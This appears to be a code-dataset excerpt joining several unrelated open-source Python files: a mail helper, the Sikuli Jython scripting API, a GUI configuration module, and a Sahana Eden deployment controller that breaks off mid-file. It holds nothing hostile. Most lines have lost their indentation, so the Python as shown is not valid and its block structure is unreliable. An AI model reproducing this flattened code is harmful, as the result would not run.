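    # name 'alert' and the 'EN' language folder are placeholders derived from the
    # configured mail_language:
    #
    #     <januapath>/mail_template/EN/alert/subject.txt
    #     <januapath>/mail_template/EN/alert/body.txt
    #     <januapath>/mail_template/EN/alert/body.html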
def sendmail(self, mailobj):
if not isinstance(mailobj, MailObj):
raise MailError('argument must be MailObj')
if not self.config.enable:
raise MailError('Mail option has been disabled, dropping mail ...')
subject = mailobj.subject
message = mailobj.message
if isinstance(mailobj.to, list):
to = mailobj.to
else:
to = [mailobj.to]
template = mailobj.template
template_args = mailobj.template_args
reply_to = mailobj.reply_to
bcc = mailobj.bcc
if self.postman:
if template:
tmpl = self.get_template(template)
msg = tmpl(to, template_args, reply_to=reply_to, bcc=bcc)
else:
msg = Message(to, subject, text=message, reply_to=reply_to, bcc=bcc)
if msg:
try:
with self.postman.connect() as c:
c.sendmail(msg)
except Exception, err:
raise MailError(err)
return True
return False
def valid_email(address):
"""
Check validity of email address
:param address: mail address to validate
:returns: True if valid, False otherwise
"""
pattern = r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"
return re.match(pattern, address)
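# Illustrative checks (the addresses are made up); the function returns a match
# object when the address looks valid and None otherwise:
#
#     valid_email('john.doe@example.org')  # -> truthy match object
#     valid_email('not an address')        # -> None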
| mesocentrefc/Janua-SMS | janua/utils/mail.py | Python | gpl-2.0 | 8,164 |
# Copyright 2010-2013, Sikuli.org
# Released under the MIT License.
# modified RaiMan 2013
from __future__ import with_statement
from org.sikuli.basics import Debug
Debug.log(3, "Jython: sikuli: Sikuli: entering")
import time
import __builtin__
import __main__
import types
import sys
import os
import inspect
Debug.log(3, "Jython: sikuli: Sikuli: constants")
import org.sikuli.script.FindFailed as FindFailed
from org.sikuli.script.FindFailedResponse import *
from org.sikuli.script.Constants import *
import org.sikuli.script.Button as Button
from org.sikuli.script.Button import WHEEL_UP, WHEEL_DOWN
from org.sikuli.basics import OS
Debug.log(3, "Jython: sikuli: Sikuli: import Region")
from org.sikuli.script import Region as JRegion
from Region import *
from org.sikuli.script import Observing
Debug.log(3, "Jython: sikuli: Sikuli: import Screen")
from org.sikuli.script import Screen as JScreen
from Screen import *
Debug.log(3, "Jython: sikuli: Sikuli: Env.addHotkey")
from Env import *
Debug.log(3, "Jython: sikuli: Sikuli: import Match")
from org.sikuli.script import Match
Debug.log(3, "Jython: sikuli: Sikuli: import Pattern")
from org.sikuli.script import Pattern
Debug.log(3, "Jython: sikuli: Sikuli: import Location")
from org.sikuli.script import Location
Debug.log(3, "Jython: sikuli: Sikuli: import ScreenUnion")
from org.sikuli.script import ScreenUnion
Debug.log(3, "Jython: sikuli: Sikuli: import Finder")
from org.sikuli.script import Finder
from org.sikuli.script import ImageFinder
from org.sikuli.script import ImageFind
Debug.log(3, "Jython: sikuli: Sikuli: import Image")
from org.sikuli.script import Image
from org.sikuli.script import ImageGroup
Debug.log(3, "Jython: sikuli: Sikuli: import ImagePath")
from org.sikuli.script import ImagePath
Debug.log(3, "Jython: sikuli: Sikuli: import App")
from org.sikuli.script import App
Debug.log(3, "Jython: sikuli: Sikuli: import KeyBoard/Mouse")
from org.sikuli.script import Key
from org.sikuli.script import KeyModifier
from org.sikuli.script.KeyModifier import KEY_CTRL, KEY_SHIFT, KEY_META, KEY_CMD, KEY_WIN, KEY_ALT
from org.sikuli.script import Mouse
Debug.log(3, "Jython: sikuli: Sikuli: import from Basics")
from org.sikuli.basics import Settings
from org.sikuli.basics import ExtensionManager
Debug.log(3, "Jython: sikuli: Sikuli: import from compare")
from org.sikuli.script.compare import DistanceComparator
from org.sikuli.script.compare import VerticalComparator
from org.sikuli.script.compare import HorizontalComparator
Debug.log(3, "Jython: sikuli: Sikuli: init SikuliImporter")
import SikuliImporter
Debug.log(3, "Jython: sikuli: Sikuli: import SikuliX")
from org.sikuli.basics import SikuliScript
from org.sikuli.basics import SikuliX
##
# some support for handling unicode and strings
#
## use instead of print if unicode strings present
# usage: uprint(s1, u1, u2, u3, s3, ...)
#
def uprint(*args):
for e in args[:-1]:
if isinstance(e, str): print e,
else: print e.encode("utf8"),
if isinstance(args[-1], str): print args[-1]
else: print args[-1].encode("utf8")
##
# decode a utf8-encoded str object into a unicode object
#
def unicd(s):
return ucode(s)
def ucode(s):
return (unicode(s, "utf8"))
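# Hedged example: the argument is assumed to be a UTF-8 encoded byte string,
# as produced by most text handling in this environment:
#
#     ucode('caf\xc3\xa9')  # -> u'caf\xe9'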
##
# loads a Sikuli extension (.jar) from
# 1. user's sikuli data path
# 2. bundle path
#
def load(jar):
def _load(abspath):
if os.path.exists(abspath):
if not abspath in sys.path:
sys.path.append(abspath)
return True
return False
if _load(jar):
return True
path = getBundlePath()
if path:
jarInBundle = os.path.join(path, jar)
if _load(jarInBundle):
return True
path = ExtensionManager.getInstance().getLoadPath(jar)
if path and _load(path):
return True
return False
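# Hedged usage sketch (the jar name is a placeholder, not a shipped extension):
#
#     if load("myExtension.jar"):
#         import myExtension
#     else:
#         popup("myExtension.jar not found")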
##
# append the given path sys.path if not yet contained
#
def addImportPath(path):
addModPath(path)
##
# append the given path image path list if not yet contained
#
def addImagePath(path):
ImagePath.add(path)
##
# return the current image path list
#
def getImagePath():
return [e.pathGiven for e in ImagePath.getPaths() if e]
##
# remove the given path from the image path
#
def removeImagePath(path):
ImagePath.remove(path)
##
# reset the image path, so it only contains the bundlepath
#
def resetImagePath(path = None):
if not path:
path = getBundlePath();
ImagePath.reset(path)
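# Hedged sketch of managing the image path list (the folder is a placeholder):
#
#     addImagePath("/projects/common-images")
#     print getImagePath()                     # bundle path plus the added folder
#     removeImagePath("/projects/common-images")
#     resetImagePath()                         # back to just the bundle path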
##
# Sets the path for searching images in all Sikuli Script methods. <br/>
# Sikuli IDE sets this to the path of the bundle of source code (.sikuli)
# automatically. If you write Sikuli scripts in the Sikuli IDE, you should
# not call this method.
#
def setBundlePath(path):
ImagePath.setBundlePath(path)
##
# return the current bundlepath (usually the folder .sikuli) or None if no bundlepath is defined
#
def getBundlePath():
return ImagePath.getBundlePath()
##
# return the parent folder of the current bundlepath
# (usually the folder containing the current script folder.sikuli)
# or None if no bundlepath is defined
#
def getParentPath():
return ImagePath.getBundleParentPath();
##
# make a valid path by joining the two paths (path2 might be a list)
#
def makePath(path1, path2):
    if (not isinstance(path2, list)):
path = os.path.join(path1, path2)
else:
path = path1
for p in path2:
path = os.path.join(path, p)
return path
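# Hedged example (POSIX-style separators assumed for readability):
#
#     makePath("/images", "icons")             # -> "/images/icons"
#     makePath("/images", ["icons", "small"])  # -> "/images/icons/small"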
##
# Sikuli shows actions (click, dragDrop, ... etc.) if this flag is set to <i>True</i>.
# The default setting is <i>False</i>.
#
def setShowActions(flag):
Settings.setShowActions(flag)
##
# Shows a message dialog containing the given message.
# @param msg The given message string.
def popup(msg, title="Sikuli"):
SikuliX.popup(msg, title)
##
# Shows a question-message dialog requesting input from the user.
# @param msg The message to display.
# @param default The preset text of the input field (default empty).
# @param title the title for the dialog (default: Sikuli input request)
# @param hidden =true makes the dialog run as a password input (input hidden with bullets)
# @return The user's input string.
#
def input(msg="", default="", title="", hidden=False):
if (hidden):
default = ""
return SikuliX.input(msg, default, title, hidden)
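# Hedged usage sketch (prompt text and defaults are illustrative):
#
#     name = input("Please enter your name", default="anonymous", title="Login")
#     secret = input("Password:", hidden=True)  # input shown as bullets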
##
# Shows a dialog request to enter text in a multiline text field
# Though not all text might be visible, everything entered is delivered with the returned text
# The main purpose for this feature is to allow pasting text from somewhere
# @param msg the message to display.
# @param title the title for the dialog (default: Sikuli input request)
# @param lines the maximum number of lines visible in the text field (default 9)
# @param width the maximum number of characters visible in one line (default 20)
# @return The user's input including the line breaks.
def inputText(msg="", title="", lines=0, width=0):
return SikuliX.input(msg, title, width, lines)
def capture(*args):
scr = ScreenUnion()
if len(args) == 0:
simg = scr.userCapture()
if simg:
return simg.getFilename()
else:
return None
elif len(args) == 1:
if __builtin__.type(args[0]) is types.StringType or __builtin__.type(args[0]) is types.UnicodeType:
simg = scr.userCapture(args[0])
if simg:
return simg.getFilename()
else:
return None
else:
return scr.capture(args[0]).getFilename()
elif len(args) == 4:
return scr.capture(args[0], args[1], args[2], args[3]).getFilename()
else:
return None
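# Hedged sketch of the accepted call forms shown above (coordinates and the
# region object are placeholders); each returns the filename of the captured
# image, or None:
#
#     capture()                      # interactive user capture
#     capture("Select the toolbar")  # interactive capture with a prompt
#     capture(someRegion)            # capture an existing Region/Screen
#     capture(0, 0, 200, 100)        # capture the given rectangle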
def selectRegion(msg=None):
if msg:
r = ScreenUnion().selectRegion(msg)
else:
r = ScreenUnion().selectRegion()
if r:
return Region(r)
else:
return None
##
# set the default screen to given or primary screen
#
# TODO where else to remember an opened remote screen?
remoteScreen = None
def use(scr = None, remote = False):
if remote:
theGlobals = inspect.currentframe().f_back.f_back.f_globals
else:
theGlobals = inspect.currentframe().f_back.f_globals
global remoteScreen
if remoteScreen:
remoteScreen.close()
remoteScreen = None
if not scr:
SCREEN = Screen()
else:
SCREEN = scr
Debug.log(3, "Jython: requested to use as default region: " + SCREEN.toStringShort())
globals()['SIKULISAVED'] = _exposeAllMethods(SCREEN, globals().get('SIKULISAVED'), theGlobals, None)
theGlobals['SCREEN'] = SCREEN
if remote:
remoteScreen = SCREEN
return SCREEN
##
# set the default screen to given remote screen
#
def useRemote(adr, port = 0):
global remoteScreen
import org.sikuli.script.ScreenRemote as SR
SCREEN = SR(adr, str(port))
if SCREEN.isValid():
return use(SCREEN, True)
else:
return None
##
# Switches the frontmost application to the given application.
# If the given application is not running, it will be launched by openApp()
# automatically. <br/>
# Note: On Windows, Sikuli searches in the text on the title bar
# instead of the application name.
# @param app The name of the application. (case-insensitive)
#
def switchApp(app):
return App.focus(app)
##
# Opens the given application. <br/>
# @param app The name of an application if it is in the environment variable PATH, or the full path to an application.
#
def openApp(app):
return App.open(app)
##
# Closes the given application. <br/>
# @param app The name of the application. (case-insensitive)
#
def closeApp(app):
return App.close(app)
##
# Sleeps until the given amount of time in seconds has elapsed.
# @param sec The amount of sleeping time in seconds.
def sleep(sec):
time.sleep(sec)
##
# shutdown and return given exit code
#
def exit(code=0):
global remoteScreen
if remoteScreen:
remoteScreen.close()
remoteScreen = None
SikuliX.cleanUp(code)
sys.exit(code)
##
# Runs the given string command.
# @param msg The given string command.
# @return Returns the output from the executed command.
def run(cmd):
return SikuliX.run(cmd)
##
# display some help in interactive mode
def shelp():
SikuliScript.shelp()
##
# helper functions, that can be used when sorting lists of regions
#
def byDistanceTo(x, y=None):
""" Method to compare two Region objects by distance of their top left.
or a regions top left to the given point by coordinates"""
return DistanceComparator(x, y)
def byX(m):
""" Method to compare two Region objects by x value. """
return HorizontalComparator().compare
def byY(m):
""" Method to compare two Region objects by y value. """
return VerticalComparator().compare
def verticalComparator():
""" Method to compare two Region objects by y value. """
return VerticalComparator().compare
def horizontalComparator():
""" Method to compare two Region objects by x value. """
return HorizontalComparator().compare
def distanceComparator(x, y=None):
""" Method to compare two Region objects by distance of their top left.
or a regions top left to the given point by coordinates"""
if y is None:
return DistanceComparator(x).compare # x is Region or Location
return DistanceComparator(x, y).compare # x/y as coordinates
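# Hedged sorting sketch (assumes `matches` is a list of Region/Match objects
# and `loc` is a Location); Jython 2 still accepts the cmp= keyword used here:
#
#     matches.sort(cmp=verticalComparator())     # top to bottom
#     matches.sort(cmp=horizontalComparator())   # left to right
#     matches.sort(cmp=distanceComparator(loc))  # nearest to loc first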
##
################## internal use only ###########################################
#
def addModPath(path):
if path[-1] == Settings.getFilePathSeperator():
path = path[:-1]
if not path in sys.path:
sys.path.append(path)
def _exposeAllMethods(anyObject, saved, theGlobals, exclude_list):
if not exclude_list:
exclude_list = [ 'class', 'classDictInit', 'clone', 'equals', 'finalize',
'getClass', 'hashCode', 'notify', 'notifyAll',
'toGlobalCoord', 'toString', 'getLocationFromPSRML', 'getRegionFromPSRM',
'capture', 'selectRegion', 'create', 'observeInBackground', 'waitAll',
'updateSelf', 'findNow', 'findAllNow', 'getEventManager',
'lastMatch', 'lastMatches', 'lastScreenImage', 'lastScreenImageFile']
#Debug.log(3, "Sikuli: _exposeAllMethods: %s called from: %s", anyObject, theGlobals['__name__'])
tosave = []
if not saved:
saved = []
for name in dir(anyObject):
if name in exclude_list: continue
try:
if not inspect.ismethod(getattr(anyObject,name)): continue
except:
continue
if name[0] != '_' and name[:7] != 'super__':
try:
saved.remove(name)
except:
pass
tosave.append(name)
#print "added:", name
theGlobals[name] = eval("anyObject."+name)
if name == 'checkWith': Debug.log(3, "%s %s", name, str(dict[name])[1:])
for name in saved:
if name in theGlobals:
#print "removed:", name
theGlobals.pop(name)
return tosave
############### set SCREEN as primary screen at startup ################
use()
| azoft-dev-team/imagrium | libs/sikuli/Sikuli.py | Python | mit | 13,054 |
#==========================
# Config Parameters
#==========================
interval_x = 6
interval_y = 6
entry_width = 30
btn_width = 5
btn_hegiht = 1
grp_offsetX = -2
grp_offsetY = -16
interval_rdbox = 60
#===================================================
# Save Path
#===================================================
savePath = 'Data/'
saveParaPath = 'Para/'
saveScanningPath = savePath + 'Scanning/'
saveImageProccesPath = savePath + 'ImageProcess/'
configName = 'config.json'
scanIndex = 'Raw'
#==========================
# Config Text
#==========================
rdbox_PlantIndexItem= ["LAB", "NDI", "ExG"]
rdbox_BinaryMethodItem= ["Simple", "Otsu", "Adaptive"]
#===================================================
# Defalut Value
#===================================================
defaultDict={\
'thrshd_gray': 128,\
'thrshd_Minsize': 1000,\
'thrshd_Maxsize': 9999,\
'Scan_X (Beg,Interval,Amount)': [0,500,4],\
'Scan_Y (Beg,Interval,Amount)':[0,500,4],\
'limit Maximum (X,Y)':[100000, 100000],\
'Max Speed (X, Y)':[400,400,400],\
'Ac/Deceleration (X, Y)':[100,100,100],\
'Camera ID':0,\
'Peripheral Setting': [('Fan',8),('Water Pump',9),('Vaccum Pump',10)],\
'Move Amount type (5 types)':[('100', 100),('500', 500),('1k',1000),('10k',10000), ('100k',100000)],\
'script Path':"Script/test.txt"\
}
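# Hedged sketch of persisting the defaults above as the config file; whether
# the application actually writes it this way is an assumption:
#
#     import json
#     with open(configName, 'w') as f:
#         json.dump(defaultDict, f, indent=2)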
| FBTUG/DevZone | FBTUG_Commander/gui_vars.py | Python | mit | 1,401 |
# -*- coding: utf-8 -*-
"""
Deployments
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
s3db.hrm_vars()
# -----------------------------------------------------------------------------
def index():
""" Customisable module homepage """
return settings.customise_home(module, alt_function="index_alt")
# -----------------------------------------------------------------------------
def index_alt():
"""
Fallback for module homepage when not customised and
no CMS content found (ADMINs will see CMS edit unless
disabled globally via settings.cms.hide_index)
"""
# Just redirect to the Mission Summary View
s3_redirect_default(URL(f="mission", args="summary"))
# -----------------------------------------------------------------------------
def mission():
""" RESTful CRUD Controller """
def prep(r):
# Configure created_on field in deploy_mission
created_on = r.table.created_on
created_on.readable = True
created_on.label = T("Date Created")
created_on.represent = lambda d: \
s3base.S3DateTime.date_represent(d, utc=True)
if r.id:
# Mission-specific workflows return to the profile page
tablename = r.tablename if not r.component else r.component.tablename
next_url = r.url(component="", method="profile", vars={})
if r.component_name == "alert":
alert_create_script()
s3db.configure(tablename,
create_next = URL(f="alert",
args=["[id]", "select"]),
delete_next = next_url,
update_next = next_url,
)
else:
s3db.configure(tablename,
create_next = next_url,
delete_next = next_url,
update_next = next_url,
)
s3.cancel = next_url
if r.component_name == "assignment":
member_id = r.get_vars.get("member_id", None)
if member_id and str(member_id).isdigit():
# Deploy-this-member action
htable = s3db.hrm_human_resource
query = (htable.id == member_id) & \
(htable.deleted != True)
row = db(query).select(htable.id, limitby=(0, 1)).first()
if row:
field = s3db.deploy_assignment.human_resource_id
field.default = row.id
field.writable = False
field.comment = None
elif r.method == "create":
atable = s3db.deploy_assignment
atable.end_date.writable = atable.end_date.readable = False
if not r.component and r.method == "profile":
represent = lambda d: \
s3base.S3DateTime.datetime_represent(d, utc=True)
s3db.deploy_alert.modified_on.represent = represent
s3db.deploy_response.created_on.represent = represent
s3base.s3_trunk8(lines=1)
else:
# All other workflows return to the summary page
s3.cancel = r.url(method="summary", component=None, id=0)
if not r.component and \
r.get_vars.get("~.status__belongs") == "2":
s3.crud_strings[r.tablename]["title_list"] = T("Active Missions")
return True
s3.prep = prep
def postp(r, output):
if not r.component:
# Override mission open actions to go to the profile page
s3_action_buttons(r,
deletable=True,
editable=True,
read_url=r.url(method="profile", id="[id]"),
update_url=r.url(method="profile", id="[id]"),
delete_url=r.url(method="delete", id="[id]"),
)
# Override the missions list-button go to the summary page
if isinstance(output, dict) and "buttons" in output:
# Override standard "List" button
buttons = output["buttons"]
if "list_btn" in buttons and "summary_btn" in buttons:
buttons["list_btn"] = buttons["summary_btn"]
elif "subtitle" in output and "rheader" in output:
# In component CRUD views, have a subtitle after the rheader
output["rheader"] = TAG[""](output["rheader"],
H3(output["subtitle"]))
return output
s3.postp = postp
return s3_rest_controller(# Remove the title if we have a component
# (rheader includes the title)
notitle=lambda r: {"title": ""} \
if r.component else None,
rheader=s3db.deploy_rheader,
)
# -----------------------------------------------------------------------------
def response_message():
"""
RESTful CRUD Controller
        - can't be called 'response' as this clobbers the web2py global!
"""
return s3_rest_controller("deploy", "response",
custom_crud_buttons = {"list_btn": None},
)
# -----------------------------------------------------------------------------
def human_resource():
"""
RESTful CRUD Controller
"""
# Tweak settings for RDRT
settings.hrm.staff_experience = True
settings.hrm.use_skills = True
settings.search.filter_manager = True
# Add deploy_alert_recipient as component so that we filter by it
s3db.add_components("hrm_human_resource",
deploy_alert_recipient = "human_resource_id",
)
# Filter to just Deployables
q = FS("application.active") != None
output = s3db.hrm_human_resource_controller(extra_filter=q)
return output
# -----------------------------------------------------------------------------
def person():
"""
'Members' RESTful CRUD Controller
- currently used as "member profile"
- used for Imports
"""
# Tweak settings for RDRT
settings.hrm.staff_experience = "experience"
settings.hrm.vol_experience = "experience"
settings.hrm.use_skills = True
settings.search.filter_manager = True
return s3db.hrm_person_controller(replace_option = None,
csv_extra_fields = [
# CSV column headers, so no T()
dict(label="Deployable",
value="true"),
# Assume volunteer if not
# specified in CSV
dict(label="Type",
value="volunteer"),
],
csv_stylesheet = ("hrm", "person.xsl"),
csv_template = ("deploy", "person"),
)
# -----------------------------------------------------------------------------
def application():
"""
Custom workflow to manually create standing applications
for deployments (for staff/volunteers)
"""
# Tweak settings for RDRT
settings.hrm.staff_experience = True
settings.hrm.use_skills = True
settings.search.filter_manager = True
def prep(r):
if not r.method and r.representation != "s3json":
r.method = "select"
if r.method == "select":
r.custom_action = s3db.deploy_apply
return True
s3.prep = prep
if "delete" in request.args or \
request.env.request_method == "POST" and auth.permission.format=="s3json":
return s3_rest_controller()
else:
#return s3db.hrm_human_resource_controller()
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def assignment():
""" RESTful CRUD Controller """
def prep(r):
mission_date = s3db.deploy_mission.created_on
mission_date.represent = lambda d: \
s3base.S3DateTime.date_represent(d, utc=True)
if r.record:
table = r.resource.table
table.mission_id.writable = False
table.human_resource_id.writable = False
if r.representation == "popup":
r.resource.configure(insertable=False)
return True
s3.prep = prep
def postp(r, output):
if r.id and isinstance(output, dict):
# Add button to Upload Appraisal
popup = r.representation == "popup"
record_id = r.id
atable = s3db.hrm_appraisal
ltable = s3db.deploy_assignment_appraisal
query = (ltable.assignment_id == record_id) & \
(atable.id == ltable.appraisal_id) & \
(atable.deleted != True)
appraisal = db(query).select(atable.id,
limitby=(0, 1)).first()
permit = auth.s3_has_permission
url = None
if appraisal and permit("update", atable, record_id=appraisal.id):
hrtable = db.hrm_human_resource
hr = db(hrtable.id == r.record.human_resource_id).select(hrtable.person_id,
limitby=(0, 1)
).first()
if hr:
get_vars = {}
if popup:
method = "update.popup"
refresh = get_vars.get("refresh", None)
if refresh:
get_vars["refresh"] = refresh
record = get_vars.get("record", None)
if record:
get_vars["record"] = record
else:
method = "update"
url = URL(c="deploy", f="person",
args=[hr.person_id, "appraisal",
appraisal.id, method],
vars=get_vars,
)
elif permit("update", r.table, record_id=record_id):
# Currently we assume that anyone who can edit the assignment can upload the appraisal
hrtable = db.hrm_human_resource
hr = db(hrtable.id == r.record.human_resource_id).select(hrtable.person_id,
limitby=(0, 1)
).first()
if hr:
get_vars = {"mission_id": r.record.mission_id,
}
if popup:
method = "create.popup"
refresh = get_vars.get("refresh", None)
if refresh:
get_vars["refresh"] = refresh
record = get_vars.get("record", None)
if record:
get_vars["record"] = record
else:
method = "create"
url = URL(c="deploy", f="person",
args=[hr.person_id, "appraisal", method],
vars=get_vars,
)
if url:
button = s3base.S3CRUD.crud_button(T("Upload Appraisal"),
_href=url,
_class="action-btn",
)
if popup:
output["items"] = button
else:
s3.rfooter = button
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def competency():
""" RESTful CRUD controller - unfiltered version """
return s3db.hrm_competency_controller()
# -----------------------------------------------------------------------------
def credential():
""" RESTful CRUD controller - unfiltered version """
return s3db.hrm_credential_controller()
# -----------------------------------------------------------------------------
def experience():
""" Experience Controller - unfiltered version """
return s3db.hrm_experience_controller()
# -----------------------------------------------------------------------------
def job_title():
""" RESTful CRUD Controller """
return s3_rest_controller("hrm", "job_title")
# -----------------------------------------------------------------------------
def training():
""" Training Controller - unfiltered version """
return s3db.hrm_training_controller()
# -----------------------------------------------------------------------------
def hr_search():
"""
Human Resource REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter to just deployables (RDRT Members)
s3.filter = FS("application.active") == True
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def person_search():
"""
Person REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter to just deployables (RDRT Members)
s3.filter = FS("application.active") == True
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("pr", "person")
# -----------------------------------------------------------------------------
def alert_create_script():
"""
Inject JS to help the Alert creation form
"""
# @ToDo: Generalise for alternate gateways
# @ToDo: Port to _compose_form
table = s3db.msg_sms_webapi_channel
gateway = db(table.enabled == True).select(table.max_length,
limitby=(0, 1)
).first()
if gateway:
max_length = gateway.max_length
if max_length is None:
# Single SMS
max_length = 160
else:
# Single SMS
max_length = 160
script = \
'''$('#deploy_alert_contact_method').change(function(){
var v=$(this).val()
if(v==1){$('#deploy_alert_subject__row,#deploy_alert_subject__row1').show()
$('#deploy_alert_subject__row1 label').html(i18n.subject+':')
S3.maxLength.init('deploy_alert_body',0)
}else if(v==2){$('#deploy_alert_subject__row,#deploy_alert_subject__row1').hide()
S3.maxLength.init('deploy_alert_body',%(max_length)s)
}else if(v==9){$('#deploy_alert_subject__row,#deploy_alert_subject__row1').show()
$('#deploy_alert_subject__row1 label').html(i18n.subject+': <span class="red">'+i18n.only_visible+'</span>')
S3.maxLength.init('deploy_alert_body',%(max_length)s)
}})''' % dict(max_length = max_length)
s3.jquery_ready.append(script)
i18n = \
'''i18n.characters_left="%s"
i18n.subject="%s"
i18n.only_visible="%s"''' % (T("characters left"),
T("Subject"),
T("Only visible to Email recipients"))
s3.js_global.append(i18n)
def alert():
""" RESTful CRUD Controller """
# Tweak settings for RDRT
settings.hrm.staff_experience = True
settings.hrm.use_skills = True
settings.search.filter_manager = True
def prep(r):
if r.component:
if r.component.alias == "select":
if not r.method:
r.method = "select"
if r.method == "select":
r.custom_action = s3db.deploy_alert_select_recipients
elif r.component_name == "response":
s3db.configure(r.component.tablename,
deletable = False,
editable = False,
insertable = False,
)
elif r.component_name == "recipient":
settings.search.filter_manager = False
from s3.s3filter import S3TextFilter, S3OptionsFilter
recipient_filters = [
s3base.S3TextFilter([
"human_resource_id$person_id$first_name",
"human_resource_id$person_id$middle_name",
"human_resource_id$person_id$last_name",
],
label=current.T("Name"),
),
s3base.S3OptionsFilter(
"human_resource_id$organisation_id",
widget="multiselect",
filter=True,
header="",
hidden=True,
),
]
if settings.get_org_regions():
recipient_filters.insert(1,
s3base.S3HierarchyFilter(
"human_resource_id$organisation_id$region_id",
lookup="org_region",
hidden=True,
)
)
s3db.configure(r.component.tablename,
filter_widgets=recipient_filters)
if r.record.message_id:
s3db.configure(r.component.tablename,
insertable=False,
deletable=False)
else:
if r.record:
if r.record.message_id:
# Already sent - so lock
s3db.configure(r.tablename,
deletable = False,
editable = False,
)
else:
alert_create_script()
s3db.configure(r.tablename,
create_next = URL(f="alert",
args=["[id]", "select"]),
deletable = False,
# @ToDo: restrict in postp to change this action button
#editable = False,
)
created_on = r.table.modified_on
created_on.readable = True
created_on.label = T("Date")
created_on.represent = lambda d: \
s3base.S3DateTime.date_represent(d, utc=True)
return True
s3.prep = prep
def postp(r, output):
if r.component:
if r.component_name == "select":
s3.actions = [{"label": str(READ),
"url": URL(f="human_resource",
args=["[id]", "profile"],
),
"_class": "action-btn read",
}
]
if r.component_name == "recipient":
# Open should open the HR profile, not the link
open_url = URL(f="human_resource",
args=["profile"],
vars={"alert_recipient.id": "[id]"},
)
# Delete should delete the link, not the HR profile
delete_url = URL(f="alert",
args=[r.id, "recipient", "[id]", "delete"],
)
s3_action_buttons(r,
read_url = open_url,
update_url = open_url,
delete_url = delete_url,
# Can't delete recipients after the alert
# has been sent:
deletable = not r.record.message_id
)
else:
# Delete should only be possible if the Alert hasn't yet been sent
table = r.table
query = auth.s3_accessible_query("delete", "deploy_alert") & \
(table.message_id == None)
rows = db(query).select(table.id)
restrict = [str(row.id) for row in rows]
s3.actions = [{"label": str(READ),
"url": URL(f="alert", args="[id]"),
"_class": "action-btn read",
},
{"label": str(DELETE),
"url": URL(f="alert", args=["[id]", "delete"]),
"restrict": restrict,
"_class": "delete-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller(rheader = s3db.deploy_rheader,
# Show filter only on recipient tab
hide_filter = {"recipient": False,
"_default": True,
}
)
# -----------------------------------------------------------------------------
def email_inbox():
"""
RESTful CRUD controller for the Email Inbox
- all Inbound Email Messages are visible here
        @ToDo: Filter to those which could not be automatically
               processed as responses to Alerts
@ToDo: Filter to those coming into the specific account used for
Deployments
@ToDo: Provide a mechanism (Action button?) to link a mail manually to
an Alert
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user", args="login"))
tablename = "msg_email"
table = s3db.msg_email
table.inbound.readable = False
table.channel_id.readable = False
table.to_address.readable = False
from s3.s3query import FS
s3.filter = (FS("response.id") == None) & \
(FS("inbound") == True)
from s3.s3forms import S3SQLCustomForm, S3SQLInlineComponent
crud_form = S3SQLCustomForm("date",
"subject",
"from_address",
"body",
S3SQLInlineComponent(
"attachment",
name = "document_id",
label = T("Attachments"),
fields = ["document_id",
],
),
)
s3db.configure(tablename,
crud_form = crud_form,
editable = False,
insertable = False,
list_fields = ["id",
"date",
"from_address",
"subject",
"body",
(T("Attachments"), "attachment.document_id"),
],
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_list = T("View InBox"),
title_update = T("Edit Message"),
label_list_button = T("View InBox"),
label_delete_button = T("Delete Message"),
msg_record_modified = T("Message updated"),
msg_record_deleted = T("Message deleted"),
msg_list_empty = T("No Messages currently in InBox")
)
def prep(r):
# Decode subject and sender fields
decode = current.msg.decode_email
if r.id:
s3db.msg_attachment.document_id.label = ""
if r.component and r.component.alias == "select":
if not r.method:
r.method = "select"
if r.method == "select":
r.custom_action = s3db.deploy_response_select_mission
represent = lambda string: decode(string)
elif not r.method and r.representation in ("html", "aadata"):
# Use custom data table method
r.method = "inbox"
r.custom_action = s3db.deploy_Inbox()
represent = lambda string: s3base.s3_datatable_truncate(decode(string))
table = r.resource.table
table.subject.represent = represent
table.from_address.represent = represent
return True
s3.prep = prep
def postp(r, output):
if r.interactive and r.record and not r.component:
# Custom CRUD button for linking the message to mission
authorised = auth.s3_has_permission("create", "deploy_response")
if authorised:
s3.rfooter = s3base.S3CRUD.crud_button(
T("Link to Mission"),
_href=URL(f="email_inbox",
args=[r.id, "select"],
),
_class="action-btn link",
)
return output
s3.postp = postp
return s3_rest_controller("msg", "email")
# -----------------------------------------------------------------------------
def email_channel():
"""
RESTful CRUD controller for Inbound Email channels
@ToDo: Allow selection of a specific Channel for Alerts
"""
def prep(r):
table = r.table
tablename = "msg_email_channel"
s3db.configure(tablename,
deletable = False,
)
if not r.id:
# Have we got a channel defined?
record = db(table.deleted == False).select(table.id,
limitby=(0, 1)
).first()
if record:
r.id = record.id
r.method = "update"
else:
r.method = "create"
if r.interactive:
table.server.label = T("Server")
table.protocol.label = T("Protocol")
table.use_ssl.label = "SSL"
table.port.label = T("Port")
table.username.label = T("Username")
table.password.label = T("Password")
table.delete_from_server.label = T("Delete from Server?")
            table.port.comment = DIV(_class="tooltip",
                                     _title="%s|%s" % (T("Port"),
                                                       T("For POP-3 this is usually 110 (995 for SSL), for IMAP this is usually 143 (993 for SSL).")))
table.delete_from_server.comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Delete"),
T("If this is set to True then mails will be deleted from the server after downloading.")))
# CRUD Strings
ADD_EMAIL_ACCOUNT = T("Add Email Account")
s3.crud_strings[tablename] = Storage(
title_display = T("Email Settings"),
title_list = T("Email Accounts"),
label_create = ADD_EMAIL_ACCOUNT,
title_update = T("Edit Email Settings"),
label_list_button = T("View Email Accounts"),
msg_record_created = T("Account added"),
msg_record_deleted = T("Email Account deleted"),
msg_list_empty = T("No Accounts currently defined"),
msg_record_modified = T("Email Settings updated")
)
return True
s3.prep = prep
def postp(r, output):
if r.interactive and isinstance(output, dict) and \
not s3task._is_alive():
poll_btn = A(T("Poll"),
_class="action-btn",
